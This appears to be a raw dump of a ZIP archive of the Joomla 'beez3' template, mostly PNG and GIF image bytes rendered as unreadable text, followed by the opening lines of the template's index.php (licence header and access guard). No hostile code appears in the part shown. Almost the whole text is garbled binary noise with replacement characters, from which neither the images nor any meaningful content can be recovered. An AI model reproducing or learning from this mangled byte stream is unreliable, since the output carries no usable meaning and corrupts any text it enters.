��:�ďw٪s�R�3�F�O頩w+�'W=�G�:ͰL#sd�:ߟ��*���I9�<MB���Q���gү�5�^�\3z��uD���tb�����5�4���ZD������Ra���[b^���'��L� ����>��sƘ0>HE�)Ӏ����3�gT�6p�c!39�!;.��35��;�|߈�0�x4���b�>���9k���38��428��r�ǣ����3*�?��o���8!Cz���e�ͤ޶���/s]�\M�B�
c`�lJ��j�k�_ҷ~��n�>v�#��o�Zf�4j�uZ�c[T¥m���%���p� �1$��{k���[���MJ���������5I���<�6��ݚH��5	-���K��Z&�a�:~uE_��i�8�t�U3�'�����5^�I�Ӏ�����u]I}��]�CMUɰT����S�y�+q��3m�����o�PT
U�a*�����Π���[R��J���0��'j�B<�E�m��o��64[�`޵�5B�'1�Ud���.����@uB��xt��1j��C� ����I�8fEfi)������[���2��v8��IӘ�?�1Z�ޜxD�/�hsye�O��d��aJ���o���O�ӻϟ��U�{xh�)O���в%3��TE�7�;�6�7Nn�=�����ѻ[wo���5b�*:Gc����.Oo��?ѯ��.�W�2m�*)�͇�gʇw��##�Ь��ڤ��K;��汌`�f�@�nA\A43��H{�k$F�&��� *�ExŮM���7��Y�O[D��O9��ޛJ/�d�㹳�x(�+i����^�����$�i�k�Gy�!�[-�=+�~�|t�V3fG��)�{jG��c�n�(����}ݨLby���xQ�k���|B'�σ_�X!X)�Wv9���E�B��\�]hCS��+y�)^n��O��kΰW
̬hDVk���)�컹��,1��΢�����^t�A�g
w�l'�_[G����[D�[�3}*
����quQ�}M��l�*��梑�g�*�L8'�ó.M�],�#U�t	��)F�>��~����߽[��Ӭ���y���R1��_��_�O�~�٧Љ_x�v᡻�'�V�/��c
���轌���/��6xo-�ި��H%/���͉Ѹ9^�>�!�MY�5�<��|��Ǘ��.b<F�{��hyT=�^)��D�h
g�x�έ�~z�<o�^^v��N,�؞��)W�d��:��wwH�.��7;O˴C�|����7?u�qt�͖gK��N�iO��q���3������[�F9�~�C�o$��Kco�36��ckĿ��fY'�}
�
��[�Y�x�v��4
��~���=�	c�bh�[�Y^Ǡ:DΉ��z��N6��!���L�Lv��مM��U+�]�����k�&gr�
&�8���;�L�f�yі�{�^�׼�?S^�8r$;�좡ճ����` �Jq]�p�E� ng������煮;W�V��#ڌ$���9}CT�G���'	��3�ԉ�o��ɃD�,]���]ƅ �e�3���(vm�[ȃn+�z�ڼ7O�ё�㥁Ddl�<�ڜ���x���3$53U�;�Og��9������[�noC�x�5��ʷ�|q���ʤh�_I��LY��n43bQ��|�VT�o�)��w�@��M�Meuxj�A�;�CZ�y���)���M~-��(/��z(����f��E�]��y���ߟZ�˜�=�z4[h��L��|hWƧ�J(�0�L��I��%�L��/�4���ӷv�d5uJRեpH������d��>�k�+�mgf>�+���s�
�
F⑇��|ZQ�#�V��h@~i�#�"���&��@,����x�M����'���#_��[H�_����"���K�H��6�\l9޾�eЯI�����'�,*$�4h�۹&_=��}*(�]NQ�5H�0��"f�˫r&�r�CO&�"�r��qb�3����J��6މ�]ؒ��r�@%��x�3�,�������m�B���패GdAwh�ɇ��T�L3�$$����U�n4��d}���ʹ=�V��	����e�w�>��-<VmDNtj����$�$�/�n�ūD�fB�ՖR^��#��<"�?�Y�ʉ��t�xY���~����,��"J�{j�6��9o'ڗ�k '�!ߕE�Z��R��r���0"IXD�*�N��q#ᢣIEND�B`�PK!W�44(beez3/images/personal/readmore_arrow.pngnu&1i��PNG


IHDR���IDATx���z�F��Q܉��L��L���7`l�W�zo���zn^�b:˲$I|�?�N���s���e�Z��!
�x4��0��r�ާ�f�Y����oCS�� �C���^�����)i��,k:y��8��<�7�5����2M��f Y�j!����[R�Td���\���)E=�0�ܲ�Z[�A���Að@�>�yٴ$�}{�FaH��i�0�}�g3(],�x
��?��rپ%�Q��?���I���-�IEND�B`�PK!0�Cj.beez3/images/personal/readmore_arrow_hover.pngnu&1i��PNG


IHDRexQPLTE�����ꎎ�YYYkkk������www��������������޺�����yxx�����������޽�����A@@\]]DDDH�jIDATxeNU�@\z}����������M��曋zt-<�\WУ����t�����T8��Zw���_z����s�o�&��=\�㐟OP��oO�<����-zr���/IEND�B`�PK!e.��}}beez3/images/plus.pngnu&1i��PNG


IHDR�ʖDIDATxc�pu�68t��ի�������^�m��jQ|c �S�=�0�w�>�������ޫ}g�y#��IEND�B`�PK!�"
"
beez3/images/slider_minus.pngnu&1i��PNG


IHDR�Fh�N�oPLTE��������������������������������������������������������񽽽������������������������333���i�	nIDATx��K��:PM<��C_�'�_�q���(�%$�Vq�~y4���F_�F�qlo�[~�c�p�x�`8 z��<���Q�2\%�eQ:�m�F���͍"�@�N��h!�2_�o4����W?c&���`֎�7�1�-�b�Q�d���̢�!tq�Ƹ�4�P]�	����B)���8-q�'���9�7V�[��(���[xV�#�ݗ�(>�$�����a�8�<�	Y?���z�4Z�q_�з&�#�$g~}N��Zx1Q=_
�o\��{�X	GXI�ƨ�{��z
�"�v��&��q'��t56LN��6(�%"M㜍Ӿ,;m�U?��C1!a�I��ʏ�p�q�c=m�@�v������^gc���ƅ��?���[e��7���5��/z�qE�_W�}��+�����.��/z��]���ˁ������x�lJ�~�+���p.�:h<�'��
>��L�0C	�Eu!z	�f6�4��t����ɆG%e%E�y|
�J( a�O�;t��t����ƒH��e8n�(p�7�!�2㦧�
���`p,c��pEs$5�r�)������h\��8���}���]����Ѹ�E�]�n>���6��{ٛ�F��L؜o��[(F��L�-k�#G��a��,��LeJ��G�Ly����
,Ju(H���JVK�h\!��=#�c�"������3�6M�湎��R��8lc1�1�&8f��W�9���L׾�Y0�.��W����k=�a�\�X"B(E�n�<_�gmm���~��,Fj�3��7wI�����q��Uzf��V�i��e����.c,j잍�ʵ�>R#@�B���~Y�f�>^����H��Ә��Q|ID�4�1�_:H�Ȥ�˄��\��S�Rc��Z�x@����H��	p'��PV7e��V�t�������dl�Dg2ϙ�0�iYH�5�ъ�X��g��"#x+B�͢��O�D�a�e�K"�-�9����MJ�5�2Ԇ~I0��x$�q^
�?�cz�|��B���M�u��6�cc���6��B47:�gb�W|�bŐ
��_ȖQS�h����9
�v��{���F�Bx���yU�/z�q)|{�����Eo��>� 9��0�s����k9+#c���eI� �h
�n�>��.n�INF��U ��2�G�X�Z/:�5~��N1�%�G��!��p����]�e�~p�ҬQ��g��RH�W��ze�7��$*S�D'��"s;!�)G�yH�����P���Y��`��hp=B�FhU�y=
m�aq��Z����BR���'8a�	uש�n�_�0<=���>�a����"p��O��w�u)����32�@��p��:�l�G��|�����"dꈠKedCП�.��A+�i��Fl0���S���8)��r���?U����ljj�1�޴�Rc�0I���c�9����Slw��w�?��vD���(�^�E���js󉝈�·��0<=���>�a��o�]�u#���7Ώ$����D���#u��ᘑ"p�s��V�9I^���ej���jkۑSBM���X��GVo�O���H8��Sm聀�V��[���:i<I���֥���͝t�(�施�l3��U�Վ	3b�Ȏ�9�N�XN�@S5����Z�-��>�b�a'�;i��۷a���ð}���;޼y��:�!�x�
E{�E�|xN�{zj���'Ii[4f��МSQױ�c	�X;��1�5�Z9}́cG4;5�H]1pa�P?yՑF��(Mo���?B��8�3H	��U�A��zƭ�j��00O̟v���|��l]����]�+���]�"i�N�_�p
)�����߾���x�}�}��0�>�~q^�����nw\�U� ��t�v�j�6i��(cjDŽ1fdG�v]'N,�J�O558ڜ�̶2��	A=��ɝ4J�K5�����u�^��D���j����f�B����-�@�����v�eR��33�)I)��z+;��,�^(t�k�߶>O*�p��%����~5�~.m���0O��ð}�}��0����x�0�Їa؇>���0O��ð}�}��0���������^(='!0�"�{�x�GQ�Űà��(�:��U�L�8u���/�
m�װ�G�Y��I���<߽���ߢp���$V��9��]',��J������sK_z5E�2�4�):8LL�*��u��\N3
��|�'�G�y�����~��jkۑSBM'����}:(���J�?�
.��:�<@txBP�� : �&���@:P�� : : : : :0Mt`p�j'�A�IEND�B`�PK!}U]��beez3/images/nav_level_1.gifnu&1i�GIF89a(�������������������������������������������������!��,(���I����ͻ�`�9di�h��M�p,�/c�x��<����pH,Ȥr�l:�Ш��Z�جv{Ex��xLg��a�n���x�@���~�����������������������������������������������;PK!H7	--beez3/images/nature/karo.gifnu&1i�GIF89a������!��,���X;PK!�M�fddbeez3/images/nature/arrow2.gifnu&1i�GIF87a�
���_^^�����ϵ��������������UUUrpq,0�I�����:���Xqf���p;PK!�)�pOO!beez3/images/nature/arrow_nav.gifnu&1i�GIF89a

�>>>��籱�wwvIII���fff���!��,

��.ũ�Ubnn��@Z�;PK!�]]!beez3/images/nature/blog_more.gifnu&1i�GIF87a�2����faa���lff���������RNNd_^���JGFunnicbNJJGEE���;99��� =?=�����PPP���(''�����ٓ�����643���\WW,�2@�'�di�h��l�p,ϭ!K!t��p82����axĨtJ�Z�جv��z��xL.���z-,K��8
�~���������������EG
LNP��Tnpvx��S68:���������������������������		��

˨

آ���������������������
H����*\Ȱ�;PK!"�qnnbeez3/images/nature/grey_bg.pngnu&1i��PNG


IHDRr��%&5IDATxc��01�xdq��7��.u5�L^�Mo��mTfTfTfTfTfTU[�߽dIEND�B`�PK!��1��"beez3/images/nature/arrow1_rtl.gifnu&1i�GIF87a�8�Ljeg����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������¿����������������~y{a[^���,�8��L����������������������������������������������������������������������������������Ԟ����������������������������������	Hۻ�	�K��Ç�"J����Ä�jܸ��
%H�C@�$���\ɲ�K�(+&�� f��6s><���ϟ?��聊+m�\zR��vL�J�J��U�O�J]�@�kŠK��ٳhӪ]˶�۷p��ʝ���ݻt���˷/�$K��e@���È+^̸��ǐ#K�L���˘3k�̹�d"K�v@���ӨS�^ͺ��װc˞M���۸s��ͻ��!K�~@����ȓ+_μ���УK��<�u�سk�ν����CR�����ӫ_Ͼ�{��ˏ�^��	��������'�h`z���6��H��Vh��dx�Z��� f��!�h�(�8�Z��0�(#4�h#2��b�.���@�x�9i�;R�"��I6餓GF	�#.yb{d��\v饖!�)�d���h�	šl��&�b�)�t�i�x��|�駟hz 蠄j衈&����6�蟐�I夔Vj饘�h¦�v�i	��*j���j*�"��ꪬ�J«��*k���j뭸�z�#�����*창�:��&�l�̖ ��F[���Vk�^���v�·�+��k�莋º�p»����k.������,���)'���7���G,��#���W���w��� �,��$�\�(����,����0���1�l��8���<����@-��D��H'���34���PG-��TWm��Xg���\w��`�-��d_-��h����l���p�-��t�m��x�=w|��߀.��j�`��5$~��7n8�C��#�x�6d�y�k^��7N�褓���w��嬷����.;�/�z��~x�4��x�.����6�'���7�����x�Wo=�9d=�����/����`��ʧ���<0���[��篿������>��8@�Uz����G>�x��'�:�Y�̠7�z� �GH���(L�
W����0��gH���8̡w����@��H�"�HL����&:�P���H�*Z�X̢���.z�`��H�2��hL����6��p���H�:��x̣���>��� I�B�L�"��F:򑐌�$'I�JZ�̤&7��Nz����(GI�R��L�*�;PK!�]�A��$beez3/images/nature/nav_level1_a.gifnu&1i�GIF89a,��������!��,,q��������ڋ�޼���H�扦�ʶ���L�����
�Ģ�L*�̦�	�J�Ԫ���j�ܮ�����N���;��������o' 8HXhx������88T;PK!�``#beez3/images/nature/arrow_small.pngnu&1i��PNG


IHDR�9'IDATxcx�Vu}���!th�~�Lg=���
RPA&�c��IEND�B`�PK!�;B���beez3/images/nature/pfeil.gifnu&1i�GIF89a"�fff�����ŵ����������������֋�����������������!�,"K��I��8�ͻFA �B��XAq&#��2�p݃�ԋ��"(,�"�R`8W��3P)"�JcpE@'��š({��z��;PK!	
M�__beez3/images/nature/box1.pngnu&1i��PNG


IHDR4
;9&IDATxcz�0	�L_p&f\������� Gue�42L��IEND�B`�PK!�Y�pp#beez3/images/nature/arrow2_grey.pngnu&1i��PNG


IHDR		J�Λ7IDATxc����@B��p�� 	��PT��v��P�Z�bg(G�!K&NR{N�IEND�B`�PK!�"e��$beez3/images/nature/searchbutton.pngnu&1i��PNG


IHDR�Q�?��IDATx��
�0C�(2e��B��p���m�t�뒪�#Fl�[��m��a�ߧ��K���'��&�
ml$��3�`��$zk��i[�6ARss�"m�u�R�	�	� !H�.	m���f� as�X/�&��:IEND�B`�PK!nC�ZZbeez3/images/nature/level4.pngnu&1i��PNG


IHDR(�- g!IDATxc��@`a��B�[=�<�@_��
����Nl+_�IEND�B`�PK!Vtn^^beez3/images/nature/box.pngnu&1i��PNG


IHDR4
;9%IDATxc|ˀ0��)���g�2_p�|�)�m�e��G��k:��IEND�B`�PK!ġd���beez3/images/nature/arrow1.gifnu&1i�GIF89a�8��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������¿����������������~y{jega[^!��,�8������������������������������������������������������������������������������������ԠHJ*������������������������������H���}��3���Ç",Я��q2j�ȱ�nj�,Q��ɓ''�����˗0cʜI�ʛ,c�T�s߁�@�J��Q��*]���wEo&��੻�X�"��݂�@�$�J��ٳhӪ]˶�۷p���}۠�ݹx���˷�߿}>„��È+^̸��ǐ#K�L���˘3k�̹��ϗ�0⠴�ӨS�^ͺ��װc˞M���۸s��ͻ�o�E�@x@����ȓ+_μ���УK�N����"h�ν����KO�����ӫ_Ͼ�����˟/�}����Wo���	�I���U`�y&�`�����F(�Th�f��v��j(�$�h������b ��vh��8樣�,V��@	�8�(��H&9a��)I�P:)�TVi�X����\v��`�)f��i�h���lvগpr��t�i�x��x��'�*蠁��硈&�(�6�裐F*餔6j¥�f�香��駟r*ꨤ�J*�����%��꫰��ꬡ�j���~:®���뮘�:ª��j챬f벰����F�쭜K��)d���v���+��k�莋º좐��{¼�����.����/,�l�'���7���G,��W�p�cl��wL� �,��$�l��(����,����0�,��4�l��#��3�<���@-��Dm��H'���L7���PG-��TWm��X=��L���`�-��d�m��h����l���1���t�m��x��7��߀.��n��}נ��#^8
�C���`�
�cNyߙw�砇�9�/���Gnx�K���7�>x�����޸��� |�o<�:$����7���G�C����_<�����;/����w��§��Է�~�~�����矿�ҿ_=��_�G�J�~�K��:���'H�
Z�̠7�z� �GH���(L�
W����0��gH���8̡w����@��H�"�HL����&:�P���H�*Z�X̢���.z�`��H�2��hL����6��p���H�:��x̣���>��� I�B�L�"��F:򑐌�$'I�JZ�̤&7��N:1;PK!�#
�^^beez3/images/nature/tabs.gifnu&1i�GIF87ad�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������,d�Hp`��*\Ȱ!�9@D�J�T�LA�
�TP�A��$
�%S�D�1�7,X@5�d��[P��Y�"=
�i�HL��-���1
4�*f��
���@I�[�.ڡ�Ν�M;@IZ+l�e+CBG$9"�0w��=rą.K��e�=�/)�@���ʘG
�L�3�!�:_hqa4�ҦI�raȡ�Ć�G6�BlC(s{7�P����8/EnDIn��(Q���`d;3�`���`���7���|�&+4ď���
~����4$HB����F�i|B����v��b�
`J� ��aX,�@�������0N��*�8A�*����c�=��c�`�Pr�F٤��D�!�D ��Vj1��[F��&/� �%5�Pf 5���/��u��B �'LL��u�ŸKd ��*hK0���z�:H��A��	:��i�APzj��Fq�Pnt�IU�:j](��&`b�����a,Ъ��
�@�8�,�t��C����F[m�?$�C	�-��p�m�x��>����D�Ј�&��{ уYx�Y�N��Hx@�.L@;��[	d�1�t����1#�̀�?��'����7Ӭs��LC4�	@�L�|�sL#�
� 5�)0�F0$X����)8�)� v�� ٧�Ͷ�p�-��t�=v�x��|�C�߀.��wn�܅���y��ގǽ�ޑ�R��g���rOη��x褗n�駀��ꬷ�z۪o;PK!W�44&beez3/images/nature/readmore_arrow.pngnu&1i��PNG


IHDR���IDATx���z�F��Q܉��L��L���7`l�W�zo���zn^�b:˲$I|�?�N���s���e�Z��!
�x4��0��r�ާ�f�Y����oCS�� �C���^�����)i��,k:y��8��<�7�5����2M��f Y�j!����[R�Td���\���)E=�0�ܲ�Z[�A���Að@�>�yٴ$�}{�FaH��i�0�}�g3(],�x
��?��rپ%�Q��?���I���-�IEND�B`�PK!ٕi�WW#beez3/images/nature/headingback.pngnu&1i��PNG


IHDR(���IDAT�c��,�4���i
a�1��P]�*��IEND�B`�PK!���uu'beez3/images/nature/arrow_small_rtl.pngnu&1i��PNG


IHDR(_oPRtRNSv��8.IDATxc��WD�/]��Rw�4�(��B�S�5�H���T���o}�S{�IEND�B`�PK!P�!ee"beez3/images/nature/arrow2_rtl.gifnu&1i�GIF87a�
���_^^�����ϵ��������������UUUrpq,0�I����!�>
& ! D���jj,_;PK!}U]��#beez3/images/nature/nav_level_1.gifnu&1i�GIF89a(�������������������������������������������������!��,(���I����ͻ�`�9di�h��M�p,�/c�x��<����pH,Ȥr�l:�Ш��Z�جv{Ex��xLg��a�n���x�@���~�����������������������������������������������;PK!9/�w?
?
 beez3/images/slider_plus_rtl.pngnu&1i��PNG


IHDR�Fh�N�oPLTE����������������������������������������������������������333�������������������������������	�IDATx���#9�r��9���iH_�o0�ȶUE��z����>:::��wt�E���8C/o��2/�|�&�o
�m�,�rU�K
|�/ ���)9逪da�E{V D���ԁ�A�� �A$���5l�@E��DvO�)���X�TN�䟆�d��'9�r��5��W��
R�rd������ۣΗ���c���9�Tй&�	�wb�l#�'Œ�9n�VM*,�k��Ұ��鰶̄��9c���2-�#��͏����wm6U�z���f�|6Tt)M�:�����4����Z��~dۀY���\��\����	�L?��M�Z�vz�;v �'8�X��(��i�"hC$�G�&f-��PF�CN�<~J|���W3���D���1/�������R;:��?�p������3J���Un�/}�?�������q<�>?��>�]�J�g�ר��&�g�km��LR�<�즧V��Y�|H([H��B�*�T�U+� `՟��b���4�@�T��٠�Q�Br
p6�ǜy�d�`���R�2uR)����������<��a����A��|��`8G���/^�j|��]WƬ¹��@�n:�Z�:�C��D]��EGGǑ���g�����������틻��*9���-�zִ"Sf�OG�h����$n+�NqK]
f����D�Ǧ
�L,��ާӰ�U_kR'2��tZA��BN �?�L*l��ՠѵ��-��ث�b&t�Ir���)��I��ǀ�G--x��D��l-
c���};_�!Lc��$*�u^96����E�\r�g<\.�/.���E�K}�J:%I��NWZ�W1��{�e�+����m����2@|��������$���fw��#��(���z	�rY�/�ՠi���v.�9�@<���6��G7J�Bd._4:S&;�$*i��J�xE4�����}s�a۬���-��9݇����ph���1�(����|�!ZO��~����x�©������ H�P��d	��0$�s8Ж_�jH3DG9����oL� W��l��`&�L�����ջ�ZY� ��$�&h�W3a�[:�ʼn���݈��Є�A�dk�Üo[R�)��&��>.��oX��㥣��<����?�=<~wF�}�;::N�7���7��X��kU��&#���Z�f騵�σ]�5����h��|�
tr�@�F>�Tg�AW-�DP���1��<��CZd�	�Mj(ȗ�A�@�Jj�ơ���4g���Mc>V$��@� `i�(0�:��  ��ȓ���H�4�̜݈8(��1s�*�+�5Ѳ��Y�utt�>��wt�E��������Q���O���g��SM������V�T��eM*����'�=��l�G�ޟ���,�5�2�X�բ0�y��}��$��-sK�+�؇�mZ�5��7��P�((��[G�3�-8�K�a����Y!�����;u�yP#:�l�*0����A�'F-I����#�cQ���h:�?���ȱa����HON��Ů��`��aWeF�ܭg7|�߿�6�;c}�Їax\_�|����įQq����2����Is\:�T��WN��b��+[.9 �mZ��u�l=�N���w�gnA���e��S���r:"?m+���	�H}K��h��h*M�q%�`�%�F���K[��:3'h���*��t(���8�1����N}ϧ+Hb�b-���eCחa�{�ð�>�;��ϟ��8í�Zl�[�B:\�ܗ5�l��,��@�(]��T�~���ku�j��p_�����aR�/>M��xA����A��|~�q��K�
�"�fe.�FF��f�!�`��<�F�KԻ���
��#t\d��+~���:��HžςC7�D��n�����~6v������0{��0\�<��o��8�q���w�7�^��/>���O�0N.Z#Ɋ-����&�nhl\,����T���<ͦKP�fJ�2�.�^-�����flP�f���HR�nG/j�M��0X���w.b�����
i�Ӣ��D�W��Cd�uZ��u�l=�N���w�gnA���e;����0|��>��0{��0\�=�a�}�=�a�Їa��x{��!�0{��0��p����;H��~y|?bo�L;�
8D?jW銎L)^�_YP�02��@̹��ҋ��?��E�ˆb3JQ����fʀ3x��ί/���X�j�^�6#E�Xb����;H�Cʖ5�e
�I�dob�s�"��	6�������4���Y�v��ڔ�R�Z^Wk=��PcԹ�m�
��(��"�����@y���ODҀ�D���сMLX^�}�IEND�B`�PK!Q�݀�beez3/images/header-bg.gifnu&1i�GIF87au�	������������������������,u50%�	8���`(��a�h��V뾰;�tm���|��pH,)Ȥr�d
�Ш;PK!q?����beez3/images/news.gifnu&1i�GIF89a�����������������!��,�ZH��=0�9��8�� �di�h��l�p,�tm�x��|��pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N���xR;PK!����8
8
!beez3/images/slider_minus_rtl.pngnu&1i��PNG


IHDR�Fh�N�oPLTE��������������������������󶶶�����������������������������333�����������������������1��	�IDATx����6`�m���^�Ƅ��� z��0��������.����.zEE����K|�p�>�h��}9߶�V���e����?����Et�F�mtFP?(�3"78�7y�yО� �A$���=l���9�����X�TN�䟂��"���P�EL_P�j�L���A����S%P���A�.�_���+��aMG'����J�)ۣ�䆳�4X-�T$X�3�He�lw��t�����c�V�eZ�Ё	�6���$�_�ٔ�s���Hn�X���c�9Is0�kcYo����G��L���qr"Ƭo@"���j���}�@d�nv�r�QpO��@"y<2�01������1^N�x_�x����UTT�(�����3��R+*�/ߌ��_xEE]���VT�E�E�GEE]􊊊���������E���?{��|۬����fmn�%I��}d���N��}H;��및+B�QaM�#Q�YB����ΟbP^
l�I*W�٠�Q�B�8�3f��	����h'
A�TZ�7�J5ypH;B��Γ�#�r;h�8ߋ�DU.S��D|��#͉�����m��<I�w
b��z�������F1�F�E�kT�E_�WT�7�����/�[[�V�oo}��mآ%u*�s��U�gΌ���X�z���	��+(���%N���L74�r0s��2�V��i!'��>`�V�"w1��Ǟ^i�k::Y��WbH����T��Z/�&j�ޚ2ƙ���Z\�*�A_O����i��76/���/�<_/�2��6���=���۷/�孏��Y�ݫR�q�`�S�'�6�m�;
vGDK r�vgdv�����,�)P���:���'��
�� �Y�����X�����y&�:��f�sT��"��E���0Y'�rN�w�8�hr	�S��<��r�=�Y�-��2��r��9�Cǡ>��.��Ǣ�z�I�h5aO1�(�x}�…S=��
��;RA!T��0�;�y�͹��mH2FCdp�#קk�`��\MH� ��gf"�4�ry�?�����2LK\ai�*�p����d���
��	���dk3gO��i�q
<����)���ߜ�:�'***\�uy&�e��}�@v܈�0,����s��)M�/��O�Th�3@�@ŏ���b���c�X\>?<�^���r�ƌ�GZ����8|��?\C��Ktg�la�z�;%D��vJЊ�[��o�-�:��꾞��^vj��hx0�1����q�����R���5v����$Z��W��-��!�E���`�ґ"����$�ݣ��2��L�m��&��i�9�y�����c?��b?��b��b�x�<=�p�����?�y���~⅃���@:�H�Yɏ5�Zj�帿��S:2�3�SU����3�!e�*F�U;��UL�`R �, t�/��9?b�ʡB_�Xm�bGr�ʢ\����UT�;Ff�Vđ/�#�(�ޘXm�43Z��J�aZ4��8#��hA&�1���^���=�>��b��b���z��Ձ7�o���́�:Uؠ����LHK[	�.�S�{�����d1�͋R�JZ�ҳ�D��D�{G�
(
S-���Ŗ�/�[И�����]���T7�7�Fst��x	`�KX�	d��+2U,�l)zk�8C�ஶ��B�&�[Ɯ���4T���Cz1m�����^'
�̺�Z,w��������=���������\�NXÅO��f��{��&��qu�:��ŵ+��� ��{��(u~����/?�=����+Q�M��iW{JP�We ��H�l�gdJ�Dd�m�"J!Kc�ҜU��e�]NMgA1�H��.�����R�������)A+�o�1��_�����b��b��\�9��O-�]�c�>Ï�;�9�"�M��x�1�g��0]�]�B�]6^L)��&��il	B����ܞ
�"��Cp��$vӖ*��]xS/<B�ɘ���ۅ}�H�݌n��,�p`�
�{!rڌ�E�	)�S�{����ā�`�(e���,=�L��Jt�w$݀�0�©
.m��➱�b��b��}�X�\�X,w��������~���E���b��{쇾X쇾X,�C_,/�_���� �;�!�'�j��V�%��mK��Ȝ�e���щ\7�<�i�[lj��CdҮ�Ȭ�Vr�)MN�HŤ��x��.�����X�1�ݮ&CB���SΎ�
f�ًLM�,1���qmZ�P����4Z$E��!H앬1u����x��9$�\��		%wh��ד��^���\���}:*�����џpg�0ڃ��с���At@t@t@t����NcS�&IEND�B`�PK!��'@��beez3/images/all_bg.gifnu&1i�GIF89a�����������������!�,T��d�I��P�y;��y`8�Q(�]��Xj�ҍ[៽�
���E�hD&57b9�*�V�yuV��%�;�R�Y�
V���v(;PK!�G��� beez3/images/blog_more_hover.gifnu&1i�GIF87a������躺�������kkk\]]��ݰ��A@@yxx��ޣ�������������ޱ�����]|�,c�Js���Ƀ��	Q����,k�&�dIZU6d�ejׄQ�MWy	�ANd���O2qi*���@P�0Q�� �H��
]�����ߦ��Q�O�����>b	
N0<iAC#1357�')+-/�$!;PK!H:.�jjbeez3/images/table_footer.gifnu&1i�GIF89ad�������������!��,d;��������ڋ�޼���H�扦�ʶ���L������Ģ�x(��fs�J��;PK!2Gs%%beez3/images/trans.gifnu&1i�GIF89ap!�,@D;PK!�~6'
'
beez3/images/slider_plus.pngnu&1i��PNG


IHDR�Fh�N�oPLTE��������������������������������������������������������񶶶������������333���������������7�f	sIDATx�Շn�@P��QS�����Ӛz"��X�r�3���=}LLL�E����>1q����\^�?V<����k%u`٣�@��j�	�bQ�C�����vL���@!�R/�ѯ'v��R�_9t�o0k��Up�p�W�9
��LGDf��81�(�)EW?�a�\��h!��ol�P¢OB��s&0"o�ȷ�B4d��[xT�#�×�8�b��J�%��R�^x�&�?�R.�~iP�/��oM�D�I�x��x�i^L��WC��Tb�*��hU-��:<��B �֠#.��zƝ���$'���ؠ��4��B�U\��	��������P�Ȥ�Q叢`�q�c=ma��N�ո�l���D111�v�^ů��Q=�E����߿'��<�E���ؾ���x�'&&^�OL�7�G�^�OL�G������ye�ϲ��=y^Q�گ���ֳ�Zd��z1 ^D�	�{�ɀ6�Ȑ@Df��sH1W��^o�@�J38A�����LG���f����i4x M��X�)��68j;v`�����xuxD�`�a8ld8�I�Pәq�ijC����el�C�EdM����?L���^�MLL�(^�-�س��s�'&���E��8�E��O���>���2��W��+���*ج�T�5��Z[�ָb��Q���"��f)f��i����*y����
,Kw H���*%U�4H#��=#�c
�"���Ħ3�6M��9FV�ԧ'�h�:���c�k�B�Q�d:�#2����A��aEiL�(��	���D��|���?��u�t�t�߷ۭ~��J+�L��*���}���k��O�QŏV�i�����U�@�1��� ��N�Gi%���rF��,�F�ē@�
�)�p3[�/�W�q2��3���L��Lq�����ԟ.����j��j܈
 �F�Q��`�/
U�i�,�
��?>�����!�r� HG�񜉎�ߖG�ɚ�h�V�=�3�q��������ѻ�b!L�>�rP[C�ͩ.�˷6)��t�p
���D��(@�~|���*�x1�	�
��1�@Rs�T��e�����6qq!�p�q���_�X5C�epu#�u�bD�62�.�؎s�ۉbbb��{�����OLL�ݷ���}2Ar$�a���[��TF�>�=@�K$�����Їa�����zx} #49e�W���ʐ��bYj�P��Q�:�S��=:Lc�T�W�]�vIԖY�K�f�ʞ>��,�Q7x�H\�+�|!�&Q�Z%:�X^��ݠ�$G�yH����P���Y��`��h'�y��誉�z,��f�q�Z����BR�}��v�M�{���k���>�a؇>�>�a^n������
>�w� e�u��#c��O��\��ٳ
�wd��J,'1`�H#��7��4�I���<O��Ȳ�Mf���K\5���3�2(@/W��S|O_�[����vw�vӲK��#���L��
�jO
��ى:�s���MJ�;�?Q�]�E�LU����NDP����0��ð}�۷�߮�z}|���G��zrp"�x��:\VU�H8s�9���?+��$/P�1��JujۑSBM���X�����)���+ʖp��Sm聀�V�z�d	3u�x�0	���K�ӛ�;�PUV�Sv;�fo���{��Ȏ�9�z�8����j@=^Y�Z�-���H�簓ɝ4o���1�s|��0�C���7o޾��GH��oyA#�h�}�h��gE��S�@�=YHJ�آ1��權z�:�`���9ڹ�ـ5^���f���+.,���u��j��7�T���c�
������f��Wu�[��-a`��?�Xu��Wg���z��o�|�U�4C'�/p����?[x���O�a��C�a�0��|�?�W�Z��z��Wz�X��C=��]��M3x'ʘ�1aF��4�]�'�S#觚,���̶2�v����Kit-�fRIM)�u�^��Dwqt
�O��f�B���tK&�m!4��3��r[�Qg4�)�(^N�����S�Z/:�5�o�>;�=p��%�<���j8�+`߮�ߧ�0��_�a�0�Їa��yzð�E`��ð}��ϧ�0��_�a�0�Їa�������__�P�zB`�C��{��k��(�b�a��J�P�~���&z�:Lی�^����kX�#Ϭ�$HN`�﮶1��(<Q�eZ}�}��W��N8�*It�1�O�sBӛJ��+}u���tiJStp���U:��d��f&����4Of�������
)թmGNm5������+A��*��o���At@t�	i@y�������@y�������4с�I�-�KJ�IEND�B`�PK!�q�hhbeez3/images/footer_bg.pngnu&1i��PNG


IHDR���)��/IDATx��BAD�=j�!�zp@�a�~�7�:;�5/����{)�m�Y&�!��f=-n��Y@L��i�lw���4Y6��H�m�,��f�M��2Y@Fܦb����
n�d�, �"=�i�lw���4Y6���,�e��8��M/�f1YܦɲY@�Ezn�d�, �"�i�l��7Y&�dqq�^��b�6�M�e���2�" @D@�" @D@�" @D@�" @D@�" @D@�" @D@�" @D@�" @D�͙���a�`�IEND�B`�PK!	И���beez3/images/blog_more.gifnu&1i�GIF87a���ꡡ����������A@@������yxx���\]]��ݰ��kkk��������������������豱�������,@k &�d�]�Y���%ZW�&�]I]�E2�PL��x�V��,d�
�@T!
G�D6Y*���2�	�:AS�@T�AN5��P*"u+-/|~"o�rfhjl$!;PK!KL��"�"beez3/index.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.beez3
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

// No direct access.
defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

JLoader::import('joomla.filesystem.file');

// Check modules
